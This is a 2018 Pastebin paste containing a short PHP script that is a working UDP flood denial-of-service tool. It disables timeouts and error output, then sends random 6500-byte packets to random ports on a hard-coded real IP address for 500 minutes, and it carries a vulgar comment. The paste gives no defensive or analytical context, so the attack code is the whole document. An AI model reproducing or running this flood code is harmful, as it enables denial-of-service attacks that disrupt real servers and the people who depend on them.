Guest User

Untitled

a guest
May 23rd, 2018
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. <?php
  2. // suck our balls, all of our balls
  3. ignore_user_abort(TRUE);
  4. set_time_limit(0);
  5. error_reporting(0);
  6.  
  7. $ip[] = "81.169.185.179";
  8.  
  9. $mins = 500;
  10. $psize = 6500;
  11.  
  12. $secs = $mins*60;
  13. $out = "";
  14. for($i=0;$i<$psize;$i++) $out .= chr(mt_rand(1, 256));
  15. $timei = time();
  16. $i = 0;
  17. while (1) {
  18. $fp = fsockopen("udp://{$ip[array_rand($ip)]}", mt_rand(1,65000), $errno, $errstr, 1);
  19. if ($fp) {
  20. fwrite($fp, $out);
  21. fclose($fp);
  22. }
  23. $i++;
  24. if ($i > 5000) {
  25. if (time() - $timei > $secs) exit();
  26. else $i = 0;
  27. }
  28. }
  29. exit();
  30. ?>
Add Comment
Please, Sign In to add comment